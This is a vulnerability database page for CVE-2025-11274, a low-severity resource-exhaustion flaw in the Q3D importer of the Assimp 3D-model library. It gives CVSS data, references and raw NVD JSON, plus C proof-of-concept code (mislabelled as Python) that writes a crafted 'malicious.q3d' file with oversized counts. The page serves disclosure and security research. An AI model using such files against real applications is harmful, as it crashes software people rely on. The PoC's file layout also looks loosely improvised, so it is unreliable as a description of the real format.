CVE-2025-11274

Description

A vulnerability was determined in Open Asset Import Library Assimp 6.0.2. Affected is the function Q3DImporter::InternReadFile of the file assimp/code/AssetLib/Q3D/Q3DLoader.cpp. This manipulation causes allocation of resources. The attack is restricted to local execution. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

3.3

Severity

LOW

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:assimp:assimp:6.0.2:*:*:*:*:*:*:* - VULNERABLE

Open Asset Import Library (Assimp) 6.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * CVE-2025-11274 - Assimp Q3DLoader Resource Allocation Vulnerability PoC
 *
 * This PoC demonstrates how to trigger resource exhaustion in Assimp's
 * Q3DImporter::InternReadFile function by crafting a malicious Q3D file
 * with abnormally large allocation requests.
 *
 * Usage: Place the generated malicious.q3d file and load it using Assimp
 *        or any application that uses the Assimp library.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

// Q3D file format magic header
static const char Q3D_MAGIC[] = "quick3Ds";

/*
 * Generate a malicious Q3D file that triggers excessive resource allocation
 * in Q3DImporter::InternReadFile.
 */
int generate_malicious_q3d(const char *filename) {
    FILE *fp = fopen(filename, "wb");
    if (!fp) {
        fprintf(stderr, "[-] Failed to create output file: %s\n", filename);
        return -1;
    }

    // Write Q3D magic header
    fwrite(Q3D_MAGIC, 1, strlen(Q3D_MAGIC), fp);

    // Write version info
    uint32_t version = 0x00010000;  // Version 1.0
    fwrite(&version, sizeof(uint32_t), 1, fp);

    // Craft an abnormally large mesh count to trigger excessive allocation
    uint32_t mesh_count = 0xFFFFFFFF;  // Intentionally oversized value
    fwrite(&mesh_count, sizeof(uint32_t), 1, fp);

    // Write vertex data with extreme dimensions
    uint32_t vertex_count = 0x7FFFFFFF;
    fwrite(&vertex_count, sizeof(uint32_t), 1, fp);

    // Fill with padding data to make the file appear valid enough for parsing
    for (int i = 0; i < 1024; i++) {
        uint32_t padding = 0xDEADBEEF;
        fwrite(&padding, sizeof(uint32_t), 1, fp);
    }

    fclose(fp);
    printf("[+] Malicious Q3D file generated: %s\n", filename);
    printf("[+] Load this file with Assimp to trigger CVE-2025-11274\n");
    return 0;
}

int main(int argc, char *argv[]) {
    const char *output = "malicious.q3d";
    if (argc > 1) {
        output = argv[1];
    }

    printf("[*] CVE-2025-11274 PoC - Assimp Q3DLoader Resource Exhaustion\n");
    printf("[*] Generating malicious Q3D file...\n");

    return generate_malicious_q3d(output);
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11274
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11274
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11274/
[4] VulDB https://vuldb.com/cve/CVE-2025-11274
[5] https://github.com/assimp/assimp/issues/6356
[6] https://github.com/user-attachments/files/22407575/poc.zip
[7] https://vuldb.com/?ctiid.327008
[8] https://vuldb.com/?id.327008
[9] https://vuldb.com/?submit.658075

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11274", "sourceIdentifier": "[email protected]", "published": "2025-10-05T01:15:35.247", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Open Asset Import Library Assimp 6.0.2. Affected is the function Q3DImporter::InternReadFile of the file assimp/code/AssetLib/Q3D/Q3DLoader.cpp. This manipulation causes allocation of resources. The attack is restricted to local execution. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:assimp:assimp:6.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "B5BC643B-B249-45CC-A377-45E37EB62AEA"}]}]}], "references": [{"url": "https://github.com/assimp/assimp/issues/6356", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/user-attachments/files/22407575/poc.zip", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://vuldb.com/?ctiid.327008", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327008", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.658075", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}